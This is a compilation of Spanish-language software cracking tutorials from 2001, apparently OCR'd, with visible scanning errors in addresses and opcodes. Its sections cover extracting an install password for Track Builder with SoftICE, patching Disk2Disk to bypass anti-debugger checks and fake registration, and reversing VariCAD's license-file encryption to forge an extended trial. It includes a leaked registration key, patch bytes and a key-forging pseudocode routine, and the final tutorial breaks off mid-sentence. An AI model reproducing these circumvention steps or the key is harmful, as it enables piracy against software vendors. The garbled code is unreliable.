password para el programa complementario del Train Dispatcher, esto es, el 
Track Builder for Train Dispatcher. 


Arrancamos, iniciamos el programa, y en la ventana del password colocamos un 
numero cualquier, el que nos de la gana. Abrimos el Softice con CTRL+D y 
ponemos 


bpx hmemcpy 


Seguido pulsamos F5 y le damos al Ok dentro del programa. Acto seguido salta el 
Softice y pulsamos las siguientes teclas. 


F11, 9 veces F12 y caemos en la siguiente linea: 

01F:00401E7A 68B0C74000 PUSH 0040C7B0 

Pulsamos 3 veces F10 y llegamos a la siguiente linea: 

015F:00401E83 FF1580E24000 CALL  [KERNEL32!lstrcmp] 

Aunque os parezca raro, hay que meterse dentro del Kernel32.dl1l para encontrar 
el password. Dicho esto pulsamos F8 para meternos en la call. Una vez dentro 


caemos en la sigueinte linea: 


015F:BFF"77288 53 PUSH  EBX 


Le damos 10 veces a F10 y llegamos a una nueva Call en este caso esta en la 
linea: 


015F:BFF"772AC E8S969FFFFF CALL  BFF71247 


le damos a F8 y entramos en la call, ya esta cerca el password, pero antes hay 
que entrar en una nueva call, en este caso esta en la linea: 


015F:BFF71265 E8EF930000 CALL BFF7A659 


Le damos a F8 y luego a F10 hasta llegar a la linea: 


015F:BFF7A75A 3BF8 CMP EDI, EAX 


Pulsamos d edi y zasss, sale un numero, en este caso es el 677141 


Lo metemos como password y el programa continua instalandose. 


Para terminar la instalacion se necesita una clave de registro, que no se como 
saltarla, pero podeis usar esta que es de la anterior version de este programa: 


4254-3779-7947 


Hasta otra, pedrolas 


Bilbao, a 22 de Marzo de 2001 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Disk2Disk v1.2 


Serial. 

Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 
No tengo idea, luego lo miraré :) 

Aficionado 


http://www.duncanamps.cony disk2disk/ 


Softl ce 3+, The Customiser, ProcDump, UPX, W32Dasm, Hex Editor, DzA Patcher o PrincessSandy 
(para crear loader si quieren), NotePad (ya verán para qué), DeDe y por último | ceDump 
(si que son muchas jeje, pero todas son útiles) 


Dek_Oin FECHA: 23/03/2001 


INTRODUCCION 


Hi!!, cuanto tiempo sin esciribir nada jejeje. Aki vuelvo con otro tuto, como era de esperar. Primero de todo gracias a WaR_SpY por 
proporcionarme el programa, que será una víctima muy pero muy interesante, nos divertiremos mucho, ya verán por qué ;) 


Como me dijo Gádix, una BUENA PROTECCION se merece un BUEN TUTORIAL jejeje. Haciéndole caso escribo esto. Hoy usaremos 
herramientas MUY útiles pero no muy comunes, como por ejemplo el programa llamado "The Customiser", que como dice su nombre 
"Customiza" las ventanas para nosotros, permitiéndonos cambiar el título, habilitar botones, deshabilitarlos, esconder ventanas, 
esconder botones, mostrar ventanas ocultas, mandar clicks del mouse, cambiar las captions de los controles y mil cosas más. Este es 
uno de mis programas favoritos y lo utilizo muy a menudo :). Tambien usaremos el NotePad, el cual nos ayudará en una pequeña 
cosa, pero necesaria. La NUEVA herramienta es el DzA's Patcher. Este parcheador de archivos puede parchear archivos empakados 
con gran facilidad, con el método de crear una seccion o poner el parche en al ultima sección. Utiliza el conocido método de (por 
ejemplo): mov byte prt [00401234], 74 y luego J MP entrypoint_original_del_programa. Muy buena tool, tnx DZA ;). En fin, 
aprenderemos bastante, vamos a la acción!. 


AL ATAKE 


Ejecutamos el programa y mmmm, qué pasa???, nos aparece el error de "Este programa ha efectuado una operación no 
admitida.....”, mmmm, pensemos....., que puede ser esto!?, yo digo... tengo el Softl CE cargado, puede que el programador 
haya implementado alguna proteccion anti-debugger y haya sido lo suficientemente inteligente como para no dar el mensaje 
de error?, pues SI jeje. Esto ha hecho. No hay problema, tenemos el |cedump, que nos esconderá el debugger, asi que no 
hay problema. Cargamos | cedump y ejcutamos el programa. Ahora sí!, ya en el SplashForm sale "Unregistered Shareware". 
Hmmm, eso no importa. Vemos que hay un menú "Register". Vamos a "Enter registration code" y tenemos 3 campos. 
Nombre, e-mail y key. El botón de "Aceptar" está deshabilitado. Esto me hace pensar que el botón se habilita cuando 
introducimos los datos correctos, por lo tanto si pudiéramos pulsar el botón cuando está deshabilitado, el programa creeria 
que nos registramos de verdad y nos mandaría a las felicitaciones :). 


Ahora toca el análisis del archivo. Con File |nsPEctor o Language 2000 analizamos le archivo y vemos que está empakado con 
UPX (el primer programa comercial que veo en mi vida que está empakado con UPX xD). Tendremos que desempakarlo, pero 
antes, para ver que pasa, adelantamos el reloj del la PC 1 año, y ejecutamos el programa. Nos salen unos errores como 
“Sorry, you have already evaluated the software......" y "Your security key has expired. Please register the software package." 
y luego la ventana principal se hace mágicamente invisible, por lo tanto no podremos trabajar ahi :P. Los messageboxes 
parecen fáciles de saltar, pero algo me dice que NO son MessageBoxaA, si quieres puedes probarlo pon BPX MESSAGEBOXA y 
carga el programa, el Softl CE no salta, por lo tanto, debemos atakar por algún otro lado. 


El ejecutable estaba empakado con UPX, pues bien, vamos a desempakarlo entonces. Abrimos ProcDump seleccionamos 


del ProcDump?, o el programador MALIGNO (xD) nos ha tendido una trampa?. J ejeje, pues es la 2Znda ;). El inteligente 
programador ha hecho algo asi (delphi): 


if FindWindow('23DB5B80','ProcDump32 (C) 1998, 1999 G-RoM, Lorian £ Stone') <> O then 
(23DB580 es el class de la ventana del ProcDump, este class varia de ventana en ventana 
(como ya debes saber), para encontrar una ventana específica debes darle el class y el 
título, en este caso si no contaramos con el customiser deberias modificar la titlebar con 
un editor hexadecimal, lo que es muy fácil, solo buscas la string y la reemplazas por lo que 


quieras) 

Showmessage ('Encontrada!') //el programador no hace Showmessage jeje 
else //directamente cierra la ventana y el programa 
Showmessage ('No encontrada!') 

end; 


Si encuentra la ventana, la cierra. Esto hizo con el ProcDump para que no nos desempake el archivo. PEEEEEERO contamos 
con The Customiser :) . Con éste podemos cambiar el título de la venana del ProcDump para que el Disk2Disk no la 
encuentre. Abrimos el The Customiser y seleccionamos la ventana del procdump, con la opción select: 


¿7 ProcDump32 (C) 1998, 1999 G-RoM, Lorian R 101 x] 
ak [PD |Addes [size [Owner | Unpack 


c windows! systemikemel32. dll FFEFB635  BFF*0000 00075000  ?7E901411 - 
c:Wwindows!systemimsgstv32.exe FFFFC199 00000000  DO000000  FFEFB635 Rebuild PE 
cwindowssystemimprexe. exe FFFFFCES 00500000 00007000  FFFFC199 - 
c:windowsisystemimstask.exe FFEO4025 01000000 00010000  FFFFFCES PE Editor 
e4archivos de programatmorton system... FFEO?4F9 00400000 00007000  FFFFFCES 
ci 4archivos de programatarchivos comu... FFEO9BD9 00400000 00013000  FFFFFCES Bhrama Server 
c windows! sustemidlmesery. exe FFEO8E89 00400000 00011000  FFFFFCES hd 


Module [mm [address [Sie | 


Dptions 


El The Customiser nos brinda todo tipo de información sobre la ventana, y en la lengueta "Text", nos permite cambiar el 
título. Vamos ahi, y cambiamos "ProcDump32 (C) 1998, 1999 G-RoM, Lorian €: Stone" por "ProcDump" por ejemplo. Podemos 
cambiarlos al que queramos. Lo hacemos y ahora lo intentamos desempakar. J ejeje, ya no se cierra y lo desempaka bien. 
Pero hay una pekeña molestia. No me gusta que el procdump me deje su sello en el exe de "Unpacked with ProcDump", asi 
que lo voy a desempakar con el mismo UPX. Abrimos una ventana de DOS y vamos al directorio de UPX. Ponemos: upx -d 

CA Tu_programalDisk2disk.exe (por ejemplo, antes recuerda SIEMPRE hacer un backup del empakado) y voilá lo desempako 
perfecto. La ventaja de hacerlo con el mismo UPX y NO con Procdump es que si lo haces con UPX te deja el exe 
desempakado EXACTAMENTE igual a como estaba antes, con todas las mismas secciones, etc. 


El programa chequea eso con VARIAS ventanas. Chequea si tenemos abierto el SMU inspector, el W32Dasm, tiene Anti- 
Frogsl CE, y algunas tools más, pero esto no es ningun problema, si queremos probar nuestro crack con el hex editor 
(guardando como crack.exe y probando a ver si funciona probando y probando hasta que funcione) y mientras tener abierto 
el W32dasm, solo cambiamos el título de la ventana del W32Dasm siguiendo los mismos pasos que antes. 


— DeStRoZaNDo E 


Ahora ha llegado el momento del Parche. Parchear el archivo para simular estar registrados. Arriba deciamos: "Vemos que 
hay un menú "Register". Vamos a "Enter registration code" y tenemos 3 campos. Nombre, e-mail y key. El botón de "Aceptar" 
está deshabilitado. Esto me hace pensar que el botón se habilita cuando introducimos los datos correctos, por lo tanto si 
pudiéramos pulsar el botón cuando está deshabilitado, el programa creeria que nos registramos de verdad y nos mandaria a 
las felicitaciones :)". 


Eso mismo, si PUDIERAMOS pulsarlo. Pero cómo?, si está deshabilitado?, pues fácil. Lo habilitamos :). Vamos al the 
customiser y en la opción "Enable" seleccionamos el boton y mágicamente éste se habilita :). Ahora llenamos los campos. Yo 
he puesto: 


Nombre: DeK_OiN 
E-Mail: dek_oinf+hotmail.com 
Key: 123456 


Ahora pulsamos el botón de "Aceptar". Nos manda al mensaje de "Congratulations, your software has been registered 
succesfully". Efectivamente no chequea todo 2 veces. Si vamos al about veremos que dice: Registered to DeK_Oi¡N. Cerramos 
el programa, lo abrimos de nuevo y en el SplashForm que sale al iniciar dice: Registered to DeK_OiN pero cuando el Form 
Principal se abre nos sale un error: "A security key error has ocurred. Please reinstall the pakage". Esto quiere decir que el 
programa chequea los datos al iniciarse. Tenemos un problemaaaaa, llegó la hora de usar DeDe!., 


Decompilamos el exe desempakado con DeDe. Vamos a Procedures y clickeamos en el Form, que parece el Principal, frMain. 
Los datos se podrian chequear en el evento FormCreate, miramos pero no vemos nada interesante. Asi que vamos a 
FormActivate y si bajamos un poco veremos esto: 


00497AB0 E823FEFDFF call 004778D8 

00497AB5 8B45F8 mov eax, [ebp-$08] 
00497AB8 5A pop edx 

00497AB9 EBAABCEFFF call 00493768 

00497ABE 83E07E and eax, +$7EF 

00497AC1 83F804 cmp eax, +804 

00497AC4 0F87F9000000 jnbe 00497BC3 

00497ACA FF2485D17A4900 jmp dword ptr [$497AD1+eax*4] 
00497AD1 6É outsb 

00497AD2 7B49 jnp 00497B1D 

00497AD4 009F7B4900E5 add [edi+$E500497B], bl 
00497ADA 7A49 jp 00497B25 

00497ADC 000B add [ebx], cl 

00497ADE 7B49 jnp 00497B29 

00497AE0 003E add [esil], bh 

00497AE2 7B49 jnp 00497B2D 

00497AE4 006A00 add [edx+$00], ch 
00497AE7 668B0DA47D4900 mov CX, word ptr [$497DA4] 
00497AEE B201 mov dl, $01 


* Possible String Reference to: 


| Please reinstall the package' 


00497AF0O B8B07D4900 


00497AF5 E846E4FBEFF 


mov eax, 


call 00455F40 


* Reference to TApplication instance 


'A security key error has occurred. 


$00497DBO 


00497AFA A148874A00 mov eax, dword ptr [$4A8748] 
00497AFF 8B00 mov eax, l[eax] 


* Reference to: forms.TApplication.Terminate (TApplication); 


00497B01 E8E66FFBFE call 0044EAEC 
00497B06 E9D9000000 jmp 00497BE4 
00497BOB 33D2 xor edx, edx 


Ahi lo tenemos. El mensaje de error, y luego Application.Terminate, o sea que se cierra el programa. Vamos a W32Dasm a la 
dirección 497AEE (en W32Dasm se ve un poco más claro). Vemos esto: 


:00497AB8 5A pop edx 

:00497AB9 EBAABCFFEF call 00493768 

:00497ABE 83E07F and eax, 0000007F 

:00497AC1 83F804 cmp eax, 00000004 
//si hemos expirado nos 
manda al mensaje de 
expired (pero como estamos 

:00497AC4 0F87F9000000 ja 00497BC3 a a 
nunca, solo tenemos que 
remover los chequeos de 
los datos que se hacen al 
inicio del programa) 

:00497ACA FF2485D17A4900 jmp dword ptr [4*eax+00497AD1] //salta a los errores 

:00497AD1 6E7B4900 DWORD 00497B6E 

:00497AD5 9F7B4900 DWORD 00497B9F 

:00497AD9 E57A4900 DWORD 00497AE5 

:00497ADD 0B7B4900 DWORD 00497B0B 

:00497AE1 3E7B4900 DWORD 00497B3E 

:00497AE5 6A00 push 00000000 

:00497AE7 668B0DA47D4900 MOV CX, word ptr [00497DA4] 

:00497AEE B201 mov dl, 01 

* Possible StringData Ref from Code Ob] ->"A security key error has occurred. " //errores 


->" Please reinstall the package" 


:00497AFO B8B07D4900 mov eax, 00497DBO 

:00497AF5 E846E4FBFE call 00455F40 

:00497AFA A148874A00 mov eax, dword ptr [004A8748] 
:00497AFF 8B00 mov eax, dword ptr [eax] 
:00497B01 ESEG6FFBFF call 0044EAEC 

:00497B06 E9D9000000 jmp 00497BE4 

:00497BOB 33D2 xor edx, edx 

:00497B0D 8B86D0020000 mov eaxX, dword ptr [esi+000002D0] 
:00497B13 E84086F9FF call 00430158 


* Possible StringData Ref from Code Obj ->"Sorry, your software has expired. " 
=>" Please register the package to " 
-=>"continue using it" 


:00497B18 BAFC7D4900 mov edx, 00497DEFC 


El JA en 497AC4 se ejecutará solo si ha expirado el periodo de evaluación. JUMP |F ABOVE _ EXPIRED y como no estará 
"Above" si no hemos expirado (nunca expiraremos por que estamos registrados), se ejecutará el jmp dword ptr 
[4*eax+00497AD1], y ese si va DIRECTO a los errores y se ejecutará SIEMPRE. Pero nosotros no queremos que se ejecute, 
asi que tras probar y probar cambiando cosas llegamos a la conclusión de que debemos cambiar: jmp dword ptr 
[4*eax+00497AD1] por ja 00497BG3, o sea FF2485D17A4900 por 0F87F9000000, solo sobra 1 byte, y no es necesario 
poner un NOP, ya que ese byte nunca se ejecutará. Vamos al hex editor, hacemos los cambios, lo guardamos como crack.exe 
y lo ejecutamos. Perfect!, ya no da esos errores!, en su lugar da otro error :). Los tipicos errores de Delphi, "Acces violation 


Abs * y bla bla bla, pero el programa se ejecuta bien, y no expira por que tenemos los datos de registrado metidos en el 
registro de Windows, y como el programa no los chequea piensa que son verdaderos. Ctrl +D para entrar al Softl CE, BPX 
MESSAGEBOXA y ejecutamos el programa. F12, sale el messagebox, luego presionamos Aceptar y el Softl CE salta de nuevo. 
Veremos que la llamada a Messageboxa está en la dirección 44EC6E. Vamos al W32Dasm para sacar el Offset y entramos al 
hex editor, rellenamos la llamada con NOPs y listo!, ya está crackeado!. 


— Creando el Parche - 


Pequeño detalle: si le damos el crack a alguien tiene que llenar los datos en la ventana, y pulsar "Aceptar". Pero si esa 
persona no tiene ni puta idea de cracking no podrá hacerlo jeje. Que hacemos?, los datos del registro se guardan en 
HKEY_CURRENT_USERISoftwaral Duncan Amplificationdisk2disk V1.21User. Las claves son: 


RegEmail "dek_ointdhotmail.com" 
RegName "DeK_OIiN" 
SecurityKey "123456" 


Con esta información deberemos crear un archivo REG, para introducir datos en el registro, para esto usamos el NotePad. Si 
no sabes como crear un REG, mira lo siguiente, asi quedó mi REG: 


REGEDIT4 


[HKEY_CURRENT_USERSoftwarelDuncan Amplificationdisk2disk V1.21User] 
"RegEmail"="dek_ointf+hotmail.com" 

"SecurityKey"="123456" 

"RegName"="DeK_OiN" 


Eso es todo, lo escribimos en NotePad y lo guardamos como disk2disk.reg. Ya está. Ahora para crear el crack podemos hacer 
2 Cosas: 


1) Crear un Loader 
2) Usar un Crea-Parches 


Esperemos a que Metamorfer termine su PGPE para crear el parche, mientras tanto podemos usar un loader o el DzA 
Patcher. Para distribuir el crack luego, podemos usar un patcher que permita patches "searchéreplace", o sea que permita 
comparar archivos de distinto tamaño (CodeFusion por ejemplo). 


Espero que hayas aprendido algo nuevo de este manual, y que te haya gustado. Si quieres hablar conmigo puedes hacerlo en 
el IRC-Hispano canal +fcrackers con el nick [DeK_OiN] o sino en EFnet, +ftntcrackers con el mismo nick. Saludos a todos los 
del canal +crackers, a los miembros de TNT, a Xasx, a_evil, PrOfEsOr X, Metamorfer, Gádix, Avalanche, Crick, Act Mago, 
cimmerian, [KRaVitZ], ShOtGaN, [thEpOpE], Mr] ade, Sorvats, KuaTo_ThoR, karpoff, CODE_MEX, ¡TeD strted, DeMiAN, 
Txotxo, TurboP, Mr.BuRnS, SiR_dReAm, vLuGo, Mr.Floppy, ka0zangel, “[G]oLe[E]”, a los de Tutorial Letal, X-Grimator, 
Sepiroth, etc..., y todo del cual me olvido ;) 


Hasta la próxima! 


Página oficial del grupo K-FoR:_http://pagina.de/kfor 
Mi dirección de E-Mail: dek ointdhotmail. com 
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Karpoff Spanish Tutor 2001 
AIM VariCAD “7.3.0.4 


PROTECCION: Archivo llave, limite de tiempo y demas restricciones 
Objetivo: Alargar la evaluacion Indefinidamente. 
. . Programa de Cad, que pesa muy poco y no tiene nada que envidiar a 
Descripcion: 
AutoCAD :) 
Dificultad: Avanzado 
DOWNLOAD: http: //www.varicad.com 
: . SoftICE, FileMON, RegMON (No valen los W32DASM y similares por 
Herramientas: e Es lA: . 
estar el código también comprimido y encriptado) 
CRACKER: OGRY FECHA: 22/03/2001 


INTRODUCCION 


Lo primero es presentarme. Soy un programador normalito, que se dedica a 

esas aburridas aplicaciones de gestión en una empresa como otra cualquiera. 
Aficionado a la astronomía y a la construcción de telescopios, necesitaba un 

buen CAD para plasmar mis ideas. Así encontré en www.varicad.com mi programa 


ideal. Versión trial por 30 días. Mmmh. Me registré, me lo bajé y me lo 
instalé. El programa era mucho mejor de lo que esperaba (ya había probado 
antes otros 5 que no me convencieron), y decidí usarlo para el diseño de mi 
nuevo telescopio. 

Lo primero que ví era que variando la fecha del sistema, el programa 
respondía con diferentes NAG's, que iban desde 'vaya a la web a registrarse 
para obtener una licencia de 30 días', hasta "Versión trial, el programa no 
guarda archivos', pasando por 'le quedan tantos días para agotar el periodo 

de prueba'. Mmmh. Una vez salvado un fichero, no se puede abrir a menos que 
la fecha del sistema sea superior a la fecha en que éste fué salvado. Y 
tampoco te deja salvarlo a menos que la fecha del sistema sea superior a 
aquella en que fué abierto. Mmmh. Si voy cambiando la fecha del sistema con 
cuidado, los 30 días de periodo de prueba se pueden transformar en ¡un 
montón de horas de trabajo real!. Bien, así que seguramente tendré tiempo 
para completar el complicado diseño del telescopio. 


Pero llegó la primavera del 2001 y apenas me quedaban 7 días para finalizar 
el periodo de vigencia. Había trabajado muy duro en el diseño y no quería 
perderlo. Probé a pedir una nueva licencia. ¡Con la nueva licencia no puedo 
abrir el fichero!. El programa avisa de que ha habido una violación de la 
seguridad y se cierra. Rayos, no me queda más remedio que saltarme la 
seguridad. 


AL ATAKE 


Lo primero fué investigar en sitios como éste. Los crackers son gente muy 
enrrollada y suelen dejar sus herramientas preferidas colgadas en la web 
para que cualquiera pueda bajarselas. Después de leer unos cuantos 
tutoriales como los de esta colección, conseguí instalar correctamente el 

Softl CE. Aprendí a manejarlo e hice algunas pruebas. Otras herramientas que 
me resultaron imprescindibles fueron el FileMON y el RegMON. Sin ellas 
tampoco hubiera podido conseguirlo. Desde aquí quiero agradecer y felicitar 
a sus autores y al cracker que facilitó la instalación de Softl CE. ¡GRACIAS! 


Unos BPX's 


Lo primero fué averiguar que hacía el programa con el varicad.Ick, el 

fichero de licencia que proporciona el proveedor del programa. FileMON 
reportaba que se abría cada vez que se iniciaba el programa, así que pusé un 
BPX CreteFileA en SICE y luego arranque el programa. Cada vez que Sl CE 
interrumpía, buscaba (con S O L FFFFFFF 'varicad.Ick') a ver si esa era la 

vez en que se abria el fichero. 35 F5's después, encontré la cadena. F12 y 
estaba en la rutina que lo había abierto. Tomé nota de la dirección, para 

que las próximas veces no tuviera que esperar tanto. Fuí siguiendo el código 
con F8's hasta que me encontré con una rutina muy interesante. En 65AC10, 
comenzaba el proceso de desencriptado del contenido del fichero. Yo me había 
dado cuenta de que en una opción del menú de la aplicación, aparecía el 
número de licencia y el nombre registrado en la WEB. Como ésta información 
sólo podría residir en el .Ick que te mandan, era claro que si aparecía en 
memoria en algún momento, era porque se acababa de ejecutar la rutina de 
desencriptación. y lo cierto era que después de 65AC10 aparecía el texto del 
nombre de licencia... al revés. Luego la clave estaba en esa rutina. La 
estudíe con detalle hasta entender lo que hacía. Reproduzco aquí mis propias 
notas: 


Unas notas 
La rutina principal de protección está en 65ACBO 


Desde allí se llama a la rutina de desencriptación del fichero de licencia, 
en 65AC10. Luego se determina el tipo de licencia 

(primer byte desencriptado) y se opera en consecuencia. Entre tanto, hay 
varias llamadas a rutinas 7*, que son accesorios de alto nivel (abrir, leer, 
cerrrar ficheros, reservar heaps de memoria, etc). 


El fichero de licencia que tengo tiene el tipo 03 (se mete por la opción 03 
de lo que parece una estructura tipo SELECT CASE). 


Rutina de lectura y desencriptación del fichero varicad.Ick 


Los 46h bytes del fichero .Ick aparecen en 9DF71C: 
(Para proteger mi seguridad, he borrado de aquí los bytes. Lo siento, pero 
no quiero problemas) 


Al llamar a 65AC10, El contenido del SP es: 


ESP-14:46 00 00 00 ; lo que había en EDI (numero de bytes a desencriptar) 
ESP-10:04 00 00 00 ; lo que había en ESI 


ESP-0C:08 00 00 00 ; lo que había en EBP 

ESP-08:00 00 00 00 ; lo que habia en EBX 

ESP-04:CC F4 9D 00 ; IO QUE HABÍA EN ECX 

9DF4A0: 

ESP+00:B6 AD 65 00 ; rutina a la que hay que volver ? 
ESP+04:1C F7 9D 00 ; puntero a la zona encriptada 
ESP+08:46 00 00 00 ; numero de bytes del fichero 
ESP+0C:DO F4 9D 00 ; puntero a la dirección de destino (b60df0) 
ESP+10:CC F4 9D 00 ; puntero 

ESP+14:84 FA 9D 00 ; puntero 

ESP+18:E8 EA 79 00 ; rutina a la que hay que volver ? 
Los registros contienen 


EAX=009DF71C ; INICIO DEL FICHERO ENCRIPTADO 
EBX=00000000 

ECX=009DF4CC 

EDX=009DF4DO 

ESI =00000004 

EDI =00000046 ; NUMERO DE BYTES DEL FICHERO 
EBP=00000008 

ESP=009DF4A0 ; Stack Pointer 

El P=0065AC10 ; PUNTO DE ENTRADA A LA RUTINA DE DESENCRI PTACION 
CS=0137 ; SEGMENTO DE CODIGO 

DS=013F ; SEGMENTO DE DATOS 

SS=013F 

ES=013F 

FS=3BF7 ; FLAGS 

GS=0000 

FLAGS ; odlszapc 


El número de ; del comentario del código indica la 'vuelta' del proceso: 


65AC10 PUSH ECX ; No sabemos que hay en ECX, pero se incrementa ESP a 9df49c 
MOV EAX, [ESP+0C] ¡contiene el 46 del numero de bytes a desencriptar 

PUSH EBX ;EBX es cero, se incrementa de nuevo el ESP a 9df498 

PUSH EBP ;EBP tiene un 8, se incrementa de nuevo ESP a 9df494 

MOV EBP, [ESP+1C] ;se carga EBP con 9df4cc (que ya estaba) 

PUSH ESI ;había un 4 en ESI, se incrementa el ESP a 9df490 

PUSH EDI ;se lleva el 46 a sp, se incrementa el ESP a 9df48c 

MOV EDI, [ESP+18] ;se lleva a EDI el 9DF71C (inicio de la zona encriptada), 
;que ya estaba en el SP 

MOV BL, [EAX+EDI-1] ;en EAX esta el numero de bytes a desencriptar, en EDI, 
la dirección base 

¡luego esto lo que hace es coger el último byte del fichero (1Ch) 

ADD EAX, -02 ;se resta 2 del número de bytes a desencriptar 

XOR BL, CC ;1Ch XOR CCh = DOh . Esta será la base para los contadores 

PUSH EAX ; guarda en el sp el número de bytes a desencriptar 

MOV BYTE PTR [ESP+17],00 ;se ponen a cero el primer byte de la direccion que 
estaba 

¿en ECX y que se cargo en el sp en la 1? linea 

MOV [ESP+1C], BL ;se carga bl (=0Dh) en el ultimo byte de la direccion de 
comienzo 

¡de la zona encriptada que se cargo en EDI, y que ya estaba en el sp 

MOV [EBP+00], EAX ¡se lleva el 44 (46-2 bytes del fichero) a la posición 
9DF4CC 

CALL 7285FB ; rutina sin sentido? 

MOV ESI, [ESP+24] ;se lleva a ESI el 9DF4DO que hay en ESP+0C 


MOV [ESI], EAX ¡se lleva a [9Df4DO] el contenido de EAX (00b60df0), 

; resultado de la rutina anterior, la que no tenía sentido 

MOV ECX, [EBP+00] ;se lleva a ECX el 044h que es la cuenta de bytes a 
desencriptar 

ADD ESP, 04 ;se hace un POP ficticio 

XOR EAX, EAX ;se pone a cero EAX 

TEST ECX, ECX ¡se comprueba que en ECX (la cuenta de bytes) no haya un O 
JBE 65AC64 ¡si hay un cero, se empieza en 65ac64 

¡Comienza el bucle de desencriptado 

65ACAF TEST AL, 01 ;se comprueba que AL sea impar. Al principio vale O, por 
lo que es 

; par y se salta a 65AC64 

;¿ahora en AL hay un 01 

¡ahora en AL hay un 02 

i¡¡ahora en AL hay un 03 

JZ 65AC64 ;si es par, ir a 65AC64, como 00 es par, salta 

;sahora no salta, porque tiene 01 

5 ahora si salta, porque tiene 02 

si ahora no salta, porque AL tiene 03 


non MOV CL, [ESP+18] ;;se lleva a CL el DO, resultado de 
;¿xorear el último byte del fichero con CCh 

ise lleva a CL el D1 que había en el contador de impares 

MOV DL, [EDI +EAX] ;;llevamos a DL el segundo byte del fichero 
“¡llevamos a DL el cuarto byte del fichero (E2) 

INC CL ;;incrementamos CL (el contador de impares) 

MOV [ESP+18], CL ;;llevamos CL a dónde estaba (en ESP+18 hay un contador de 
impares) 

XOR DL, CL ;;DL= 94 XOR D1=45h 

1¡¡DL=E2 XOR D2=30h 

JMP 65AC6B ;;a la rutina de 'colocación' 


65AC64 MOV DL [EDI +EAX] ; llevar a DL el byte del fichero apuntado por EAX 
(10) 

¡ahora FEh, el tercer byte del fichero 

par DEC BL ;¡decrementar BL (el contador que empezó siendo el último byte del 
¡fichero XOR CC = DO, ahora pasa a CF 

5 ahora en BL hay CF, que pasa a CE 

XOR DL, BL ;¡DL=CC XOR CF=03h 

7 DL=FE XOR CE=30h 


65AC6b MOV ECX [ESI] ;en [ESI] esta la dirección de destino (B60DfO0) 
poner MOV [EAX+ECX], DL ¡llevamos DL a la dirección de destino + EAX (el 
contador de bytes) 

MOV EDX, [ESI] ;ahora ponemos la dir de dest en EDX 

MOV CL, [EAX+EDX] ;para cargar en CL el byte que había en DL 

MOV DL, [ESP+13] ;llevamos a DL el contador de ESP+13, que se inicializó con 
00 

;; pero ahora tiene 03 (el byte generado en la anterior vuelta) 

ADD DL, CL ¡sumamos el contador con el byte producido 

;¡ahora en DL hay 45+03=48h 

¡ahora en DL hay 48+30=78h 

si¡¡ahora en DL hay 78+30=A8h 


MOV ECX, [EBP+00] ; llevamos a ECX el número de bytes a desencriptar (44) 
; sigue siendo 44 

INC EAX ¡antes 00, ahora 01 

¡antes 01, ahora 02 

CMP EAX, ECX ; ¿hemos llegado al final? 

MOV [ESP+13], DL ;ahora ponemos DL (=03) en el 'contador' 


¿y ahora ponemos 48 en el contador (o es un CRC???) 
¡y ahora el 78, esto es un CRC, me juego la barba... 
sy ahora el A8, ES UN CRC por suma de bytes enteros... 


JB 65ACAF ;si no hemos dado con el final, a por otro byte 


MOV EAX, [ESP+1C] ;si ya hemos llegado al final, 

MOV DL, [ESP+13] ;aqui (en el CRC) tiene que haber lo mismo que en en 
penúltimo byte 

¿del fichero 

CMP DL, [EAX+EDI-2] 

JZ OO65ACAA ;o moriras... 


MOV ECX, [EBP+00] 
MOV EDI, [ESI] 
MOV EDX, ECX 
SHR ECX, 02 
XOR EAX, EAX 
REPZ STOSD 
MOV ECX, EDX 
AND ECX, 03 
REPZ STOSB 
65ACAA POP EDI 
POP ESI 

POP EBP 

POP EBX 

POP ECX 

RET 


Zona de 44h datos desencriptada 


BDODFO: 

(Si no he puesto la zona encriptada, aún menos voy a poner la 
desencriptada...) 

Las fechas que aparecen son: 


39757575 Fecha de fin de licencia (modificada para proteger mi seguridad) 
39656565 Fecha de inicio de licencia (modificada para proteger mi seguridad) 


Después de desencriptadas, las fechas son comparadas con las que aparecen en 
78CE98, y si no coinciden, casca. 


Lo curioso es que si las modificas en esa posición, y en BDODFO en el 

momento adecuado (justo después de que acabe de ejecutarse 65ac10), y pones 
A3757575 por ejemplo, te aparece un bonito NAG que te informa de que tienes 
4296 (o más) días para probar. 


Pero si a la siguiente ejecución, no coincide lo que se desencripta del 
fichero con lo que pusiste (que de alguna manera, recoge y guarda de la 
anterior ejecución), te vuelve a salir el NAG de 'buscate una licencia". 


Si apartir de la rutina inversa a la de desencriptación (ver psudocódigo) 
generas un fichero con la misma fecha que dejaste en 78CE98, a partir de ese 
momento, tienes (ya para siempre) 4296 días (o más) para 'probar' el 
programa. Espero que saquen otra versión antes de que se acabe el tiempo 
para probarlo ;-)))))))))) 


Pseudocódigo de la rutina inversa 


Esta rutina trata de generar un fichero de licencia. Trataremos de no tocar 
nada más que la fecha de finalización de la licencia de un fichero ya 
existente. 


Lo primero, leer el fichero ya existente y cambiar la fecha por otra un poco 
mayor (10 o 20 años mayor). 
la zona a encriptar tendrá 44h bytes 


CRC=suma de todos los bytes (despreciando reboses) 
ByTabla[44] = 

(oculto para proteger la seguridad) 

ByFichero[ 46] 

ByContador=0h 

ByContaPAR=DOh 

ByContaNON=DOH 

ByNuevo = 00h 

while ByContador==44 
ByCRC=ByCRC+ByTabla[ByContador] 

si ByContador es par 

ByContaPAR-- 

ByNuevo=ByTabla[ ByContador] XOR ByContaPAR 
si no es par 

ByContaNON-- 

ByNuevo=ByTabla[ ByContador] XOR ByContaNON 


ByContador++ 

ByFichero[ ByContador] =ByNuevo 
wend 

ByFichero[ ByContador] =ByCRC 
ByFichero[ ByContador+1]=1Ch 


Si se sigue TODO el procedimiento, se desprotege. Te deja el NAG, pero no es 
tan malo, despues de todo... 


Un dato oculto. 


Sin embargo, falta algo... ¿De dónde sale la fecha que aparece en 78CE98?. 
Pomenos un BPM 78CE98 W para que SICE salte cuando alguien 'toque' allí, y 
volvemos a reiniciar el programa. Cuando salta el BP, FileMON acaba de 
registrar la apertura para lectura de un fichero: system.con. Es curioso. En 
las primeras observaciones del entorno, este fichero era de tipo plano, con 
todo 'al aire'. ¿Que oculta system.con? 


Lo abrimos una vez más con el notepad. Un montón de parámetros más o menos 
inteligibles... nada a primera vista. Hagamos suposiciones. Hubiera sido 
